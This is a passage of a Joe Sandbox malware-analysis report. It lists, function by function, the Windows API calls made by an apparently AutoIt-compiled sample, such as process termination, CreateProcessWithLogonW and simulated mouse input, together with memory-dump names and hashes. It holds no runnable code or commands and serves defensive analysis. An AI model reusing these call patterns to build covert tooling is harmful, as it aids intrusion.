                                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00F299B3
                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00F299D2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 2537439066-0
                                                                                        • Opcode ID: 133407d5a40f6b4e91bfa2daa871a696be87b67dbb7b458b5e2fac67bfd8da6d
                                                                                        • Instruction ID: 98d458552cbacc7c092d6744cb83e64bcc4a8ab47ab907b6bccb78f58f9d458a
                                                                                        • Opcode Fuzzy Hash: 133407d5a40f6b4e91bfa2daa871a696be87b67dbb7b458b5e2fac67bfd8da6d
                                                                                        • Instruction Fuzzy Hash: 90316131A00119ABDB109F95DC85E6EB7B8FF45710F1480A9F904AB256D774DE14DBA0
                                                                                        Function 00F39B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,00F377F4,?,?,00000000,00000001), ref: 00F39B53
                                                                                          • Part of subcall function 00F36544: GetWindowRect.USER32(?,?), ref: 00F36557
                                                                                        • GetDesktopWindow.USER32 ref: 00F39B7D
                                                                                        • GetWindowRect.USER32(00000000), ref: 00F39B84
                                                                                        • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00F39BB6
                                                                                          • Part of subcall function 00F27A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00F27AD0
                                                                                        • GetCursorPos.USER32(?), ref: 00F39BE2
                                                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00F39C44
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                        • String ID:
                                                                                        • API String ID: 4137160315-0
                                                                                        • Opcode ID: dfb1f7c982fa401054743b64cfd6dba65a0627fd1edbc6e6d1b6120769383df3
                                                                                        • Instruction ID: 9937b65d9cf24bcc4be4a3e290778460d009bb87fbf0b1ab0a449c0199749446
                                                                                        • Opcode Fuzzy Hash: dfb1f7c982fa401054743b64cfd6dba65a0627fd1edbc6e6d1b6120769383df3
                                                                                        • Instruction Fuzzy Hash: 88310172A08319ABC710DF14DC49F9AB7EDFF88324F00092AF595D7181DAB1EA04DB92
                                                                                        Function 00F1AF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00F1AFAE
                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00F1AFB5
                                                                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00F1AFC4
                                                                                        • CloseHandle.KERNEL32(00000004), ref: 00F1AFCF
                                                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F1AFFE
                                                                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 00F1B012
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                        • String ID:
                                                                                        • API String ID: 1413079979-0
                                                                                        • Opcode ID: b69a543f1c9eb25b806e62459becd09b2f3d160be253dc05881533a595c0e357
                                                                                        • Instruction ID: 0416ab0add50b562e3d5f69b40470606655a59c7f42c2fb002a1b66319d0c6b1
                                                                                        • Opcode Fuzzy Hash: b69a543f1c9eb25b806e62459becd09b2f3d160be253dc05881533a595c0e357
                                                                                        • Instruction Fuzzy Hash: 78214CB290520DABDB028FA4DD09BEE7BA9AB48314F044015FA01A2161C3B6DDA5FB61
                                                                                        Function 00F4EBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00EFAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00EFAFE3
                                                                                          • Part of subcall function 00EFAF83: SelectObject.GDI32(?,00000000), ref: 00EFAFF2
                                                                                          • Part of subcall function 00EFAF83: BeginPath.GDI32(?), ref: 00EFB009
                                                                                          • Part of subcall function 00EFAF83: SelectObject.GDI32(?,00000000), ref: 00EFB033
                                                                                        • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00F4EC20
                                                                                        • LineTo.GDI32(00000000,00000003,?), ref: 00F4EC34
                                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00F4EC42
                                                                                        • LineTo.GDI32(00000000,00000000,?), ref: 00F4EC52
                                                                                        • EndPath.GDI32(00000000), ref: 00F4EC62
                                                                                        • StrokePath.GDI32(00000000), ref: 00F4EC72
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                        • String ID:
                                                                                        • API String ID: 43455801-0
                                                                                        • Opcode ID: 4ddf65da56d601af68e6596126ec1ef9919224180234e8f0b8d6e0ea814fdce3
                                                                                        • Instruction ID: 71d92668da13d86aebc64018d963816658edbdfe7eb5b68e52d4dee12e2d8762
                                                                                        • Opcode Fuzzy Hash: 4ddf65da56d601af68e6596126ec1ef9919224180234e8f0b8d6e0ea814fdce3
                                                                                        • Instruction Fuzzy Hash: 49111B7250014DBFEF029F90DD88EEA7F6DEB08360F048122FE189A160D7B19D55EBA0
                                                                                        Function 00F1E19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 00F1E1C0
                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 00F1E1D1
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F1E1D8
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00F1E1E0
                                                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00F1E1F7
                                                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 00F1E209
                                                                                          • Part of subcall function 00F19AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00F19A05,00000000,00000000,?,00F19DDB), ref: 00F1A53A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                        • String ID:
                                                                                        • API String ID: 603618608-0
                                                                                        • Opcode ID: e69ac34bc81bd834bcfae5faa6db87ce48b1df14c7c1f998f235534c71270e9b
                                                                                        • Instruction ID: 431e7a69309d201f96fd6cbfc635eed81552461985dae23f09182ad74c0e9e9f
                                                                                        • Opcode Fuzzy Hash: e69ac34bc81bd834bcfae5faa6db87ce48b1df14c7c1f998f235534c71270e9b
                                                                                        • Instruction Fuzzy Hash: 71018FB5F00218BFEB109BA6CC45B5EBFB8EB48351F004066EE04A7290D6B19C01DBA0
                                                                                        Function 00F07B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __init_pointers.LIBCMT ref: 00F07B47
                                                                                          • Part of subcall function 00F0123A: __initp_misc_winsig.LIBCMT ref: 00F0125E
                                                                                          • Part of subcall function 00F0123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00F07F51
                                                                                          • Part of subcall function 00F0123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00F07F65
                                                                                          • Part of subcall function 00F0123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00F07F78
                                                                                          • Part of subcall function 00F0123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00F07F8B
                                                                                          • Part of subcall function 00F0123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00F07F9E
                                                                                          • Part of subcall function 00F0123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00F07FB1
                                                                                          • Part of subcall function 00F0123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00F07FC4
                                                                                          • Part of subcall function 00F0123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00F07FD7
                                                                                          • Part of subcall function 00F0123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00F07FEA
                                                                                          • Part of subcall function 00F0123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00F07FFD
                                                                                          • Part of subcall function 00F0123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00F08010
                                                                                          • Part of subcall function 00F0123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00F08023
                                                                                          • Part of subcall function 00F0123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00F08036
                                                                                          • Part of subcall function 00F0123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00F08049
                                                                                          • Part of subcall function 00F0123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00F0805C
                                                                                          • Part of subcall function 00F0123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00F0806F
                                                                                        • __mtinitlocks.LIBCMT ref: 00F07B4C
                                                                                          • Part of subcall function 00F07E23: InitializeCriticalSectionAndSpinCount.KERNEL32(00F9AC68,00000FA0,?,?,00F07B51,00F05E77,00F96C70,00000014), ref: 00F07E41
                                                                                        • __mtterm.LIBCMT ref: 00F07B55
                                                                                          • Part of subcall function 00F07BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00F07B5A,00F05E77,00F96C70,00000014), ref: 00F07D3F
                                                                                          • Part of subcall function 00F07BBD: _free.LIBCMT ref: 00F07D46
                                                                                          • Part of subcall function 00F07BBD: DeleteCriticalSection.KERNEL32(00F9AC68,?,?,00F07B5A,00F05E77,00F96C70,00000014), ref: 00F07D68
                                                                                        • __calloc_crt.LIBCMT ref: 00F07B7A
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00F07BA3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                        • String ID:
                                                                                        • API String ID: 2942034483-0
                                                                                        • Opcode ID: bd1cf52292bacc9b114ff95b22e7496643bb916bd08b34dde296538445d10040
                                                                                        • Instruction ID: 9faaeb4c9fe804b6ecc9aacdd0f561e6579a8edb0e6773f2eccab7be57876ae1
                                                                                        • Opcode Fuzzy Hash: bd1cf52292bacc9b114ff95b22e7496643bb916bd08b34dde296538445d10040
                                                                                        • Instruction Fuzzy Hash: 60F0BB72E1D35159EA247734BC0764B37C4AF41730B2006D9F860C50D7FF68B84271A1
                                                                                        Function 00EE27EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00EE281D
                                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00EE2825
                                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00EE2830
                                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00EE283B
                                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00EE2843
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EE284B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Virtual
                                                                                        • String ID:
                                                                                        • API String ID: 4278518827-0
                                                                                        • Opcode ID: b619284036433077009cc706209f3cb0b9edae03216650d804cc9c8ebea8755d
                                                                                        • Instruction ID: 7b25f71ddf25f80b588793ed8f11a5d88ab1638bfb3bdcbd38ff13dd04fab8f4
                                                                                        • Opcode Fuzzy Hash: b619284036433077009cc706209f3cb0b9edae03216650d804cc9c8ebea8755d
                                                                                        • Instruction Fuzzy Hash: 5D0144B0A02B5ABDE3008F6A8C85A52FEA8FF19354F00411BE15C47A42C7F5A864CBE5
                                                                                        Function 00F29AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                        • String ID:
                                                                                        • API String ID: 1423608774-0
                                                                                        • Opcode ID: 930d99df498e06f63c566dd6c3169eb951732fe1f379202a599aeab2841741e4
                                                                                        • Instruction ID: 4d87ee8d11cea752cb282ff55246710c95cc86eb523bb3788479c25e21a1ea2b
                                                                                        • Opcode Fuzzy Hash: 930d99df498e06f63c566dd6c3169eb951732fe1f379202a599aeab2841741e4
                                                                                        • Instruction Fuzzy Hash: 27018132A06325ABD7156F95FC59DEB7769FF88711B040429F503930A4DBE89800FB60
                                                                                        Function 00F27BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00F27C07
                                                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00F27C1D
                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00F27C2C
                                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F27C3B
                                                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F27C45
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00F27C4C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                        • String ID:
                                                                                        • API String ID: 839392675-0
                                                                                        • Opcode ID: b97e9441181dae6f00cb54e53ac5ec3bf98d8c9946f9eac9e7a32fb1dd5e778f
                                                                                        • Instruction ID: e533f621adcf5eb50050b8a6ad8e0e3529eb918c17fd339c1158d8e88e1bd54e
                                                                                        • Opcode Fuzzy Hash: b97e9441181dae6f00cb54e53ac5ec3bf98d8c9946f9eac9e7a32fb1dd5e778f
                                                                                        • Instruction Fuzzy Hash: A7F03A72A4215CBBE7215B62DC0EEEF7B7CEFCAB11F000018FA11A1061D7E15A41E6B5
                                                                                        Function 00F29A20 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 00F29A33
                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,00F55DEE,?,?,?,?,?,00EEED63), ref: 00F29A44
                                                                                        • TerminateThread.KERNEL32(?,000001F6,?,?,?,00F55DEE,?,?,?,?,?,00EEED63), ref: 00F29A51
                                                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00F55DEE,?,?,?,?,?,00EEED63), ref: 00F29A5E
                                                                                          • Part of subcall function 00F293D1: CloseHandle.KERNEL32(?,?,00F29A6B,?,?,?,00F55DEE,?,?,?,?,?,00EEED63), ref: 00F293DB
                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00F29A71
                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,00F55DEE,?,?,?,?,?,00EEED63), ref: 00F29A78
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                        • String ID:
                                                                                        • API String ID: 3495660284-0
                                                                                        • Opcode ID: b8a06061b0fd04f024b1b6cc7c4e91eb924c20bd1c1100c1e5b5d44ab0f11ab4
                                                                                        • Instruction ID: c38b3d8a3e9bfe7ec5a086469489db971488c2a7d89236c966ad67e5101f9c6c
                                                                                        • Opcode Fuzzy Hash: b8a06061b0fd04f024b1b6cc7c4e91eb924c20bd1c1100c1e5b5d44ab0f11ab4
                                                                                        • Instruction Fuzzy Hash: 7AF05E32A45219ABD7111FA4FC99DEE7729FF88711F140425F503960A0DBF99801FB61
                                                                                        Function 00EE1CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00EFF4EA: std::exception::exception.LIBCMT ref: 00EFF51E
                                                                                          • Part of subcall function 00EFF4EA: __CxxThrowException@8.LIBCMT ref: 00EFF533
                                                                                        • __swprintf.LIBCMT ref: 00EE1EA6
                                                                                        Strings
                                                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00EE1D49
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                        • API String ID: 2125237772-557222456
                                                                                        • Opcode ID: 4d0d050408b5570a7110f1d4632f1c142167e8c8366141c8e903caa65aacbdd4
                                                                                        • Instruction ID: 158c246f33be83f9b0d1d1a2fa15dfef08bb3a58dbca2d704fed82381030a59c
                                                                                        • Opcode Fuzzy Hash: 4d0d050408b5570a7110f1d4632f1c142167e8c8366141c8e903caa65aacbdd4
                                                                                        • Instruction Fuzzy Hash: 2A91DD711043899FC724EF25C882C6EB7E4BF84700F00595DFA86A72A1EB70ED09DB92
                                                                                        Function 00F3AFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(?), ref: 00F3B006
                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00F3B115
                                                                                        • VariantClear.OLEAUT32(?), ref: 00F3B298
                                                                                          • Part of subcall function 00F29DC5: VariantInit.OLEAUT32(00000000), ref: 00F29E05
                                                                                          • Part of subcall function 00F29DC5: VariantCopy.OLEAUT32(?,?), ref: 00F29E0E
                                                                                          • Part of subcall function 00F29DC5: VariantClear.OLEAUT32(?), ref: 00F29E1A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2159874340.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true
                                                                                        • Associated: 00000000.00000002.2159854081.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159928574.0000000000F8E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159967161.0000000000F9A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.2159982529.0000000000FA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_ee0000_CCE 30411252024.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                        • API String ID: 4237274167-1221869570
                                                                                        • Opcode ID: e4fb1903ef4cf6f1c1bf7abc654731411d5bfe00af78844f86468f39938bff22
                                                                                        • Instruction ID: 16e1f704baea546d0b4c5031325c4b60672c09398010a0f99558a2c68729d0c2
                                                                                        • Opcode Fuzzy Hash: e4fb1903ef4cf6f1c1bf7abc654731411d5bfe00af78844f86468f39938bff22
                                                                                        • Instruction Fuzzy Hash: 0E91BB70A083459FCB10DF24C891A5BBBF4EF88720F04496DF99A9B362DB31E905DB52
                                                                                        Function 00F25347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
